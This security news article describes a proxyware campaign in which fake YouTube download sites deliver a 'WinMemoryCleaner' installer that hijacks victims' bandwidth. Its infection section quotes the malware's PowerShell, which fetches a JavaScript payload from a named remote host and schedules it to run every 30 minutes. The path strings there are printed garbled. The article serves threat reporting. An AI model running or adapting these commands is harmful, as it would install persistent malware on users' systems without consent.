Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts

Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

Proxyware programs typically share idle network throughput, promising remuneration to end users, but com promise victims unwittingly supply bandwidth without compensation.

In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

Infection Mechanism

A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a stealthy installation of Node.js:-

Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMPnode.msi"
Start-Process msiexec.exe -ArgumentList '/i',$env:TEMP + 'node.msi','/qn' -Wait

Once Node.js is in place, the script downloads pas.js from a cloudfront URL and registers it:-

$jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFilesWinMemoryCleanerp.js"
schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFilesWinMemoryCleanerp.js"

Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.